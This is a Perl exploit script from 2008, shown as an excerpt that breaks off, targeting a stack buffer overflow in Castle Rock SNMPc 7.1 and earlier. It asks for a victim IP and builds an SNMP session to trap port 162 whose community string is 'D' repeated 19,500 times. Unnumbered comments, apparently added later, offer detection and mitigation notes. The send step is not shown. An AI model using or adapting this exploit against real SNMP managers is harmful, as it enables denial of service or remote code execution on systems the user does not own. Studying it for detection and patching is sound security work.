1 #!usr/bin/perl −w
2
3 ################################################################################################################
4 # Stack−based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and
5 # earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code
6 # via a long community string in an SNMP TRAP packet.
7 #
8 # Refer:
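9 # http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1
# (this NVD link carries only a session parameter and no vulnerability identifier,
# so it does not point at a specific entry; the SecurityFocus BID link below is the usable reference)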
10 # http://www.securityfocus.com/bid/28990/discuss
11 #
12 #
13 # To run this exploit on MS Windows replace "#!usr/bin/perl −w" with "#!Installation_path_for_perl −w"
14 # (say #!C:/Program Files/Perl/bin/perl −w)
15 #
16 # This was written strictly for educational purposes. Use it at your own risk.
17 # The author will not bear any responsibility for any damages whatsoever.
18 #
19 # Author: Praveen Darshanam
20 # Email: praveen[underscore]recker[at]sify.com
21 # Date: 11th November, 2008
22 #
23 # NOTE: Thanks to all my colleagues at iPolicy
24 # For reliable security solutions please visit http://www.ipolicynetworks.com/
25 #
26 ##################################################################################################################
27
28 use Net::SNMP;
29
# Session setup for the proof of concept described in the header: read the
# manager's address from STDIN and open a Net::SNMP session whose community
# string is 19,500 characters long. Nothing in these lines transmits a trap;
# presumably the code past this excerpt does -- confirm against the full listing.
#
# Detection notes for defenders:
#   * The header attributes the overflow to an over-long community string in
#     an SNMP TRAP, so the reliable signal is the LENGTH of the community
#     field in traffic to the trap port, not the fill byte used here.
#   * A datagram carrying a community string this size will not fit in a
#     standard 1500-byte Ethernet MTU, so expect IP fragmentation; sensors
#     need to reassemble fragments before inspecting the SNMP header.
# Mitigation: the header lists SNMPc 7.1 and earlier as affected; beyond
# updating, limit which hosts may send to the manager's trap port.
30 printf("Enter the IP Adress of Vulnerable SNMP Manager ");
31 $host_vulnerable = <STDIN>;
# 162 is the standard SNMP trap port, matching the "SNMP TRAP packet" vector
# named in the header.
32 $port = 162;
# The oversized field: the character "D" repeated 19,500 times.
33 $community = "D" x 19500;
34
# session() is called in list context: it yields the session object and an
# error string, and the session is undefined when creation fails.
35 ($session, $error) = Net::SNMP−>session(
36 −hostname => $host_vulnerable,
37 −port => $port,
38 −community => $community, # v1/v2c
# Message size limit set to 65535 so a message holding the long community
# string is permitted (NOTE(review): assumed to exceed the module default -- confirm).
39 −maxmsgsize => 65535,
40 );
# Report the session-creation error and stop with a non-zero exit status.
41 if (!defined($session))
42 {
43 printf("ERROR: %s.\n", $error);
44 exit 1;
45 }
46
47 $ipaddress = "172.16.16.4";
48 #Throwing an error without Agent so randomly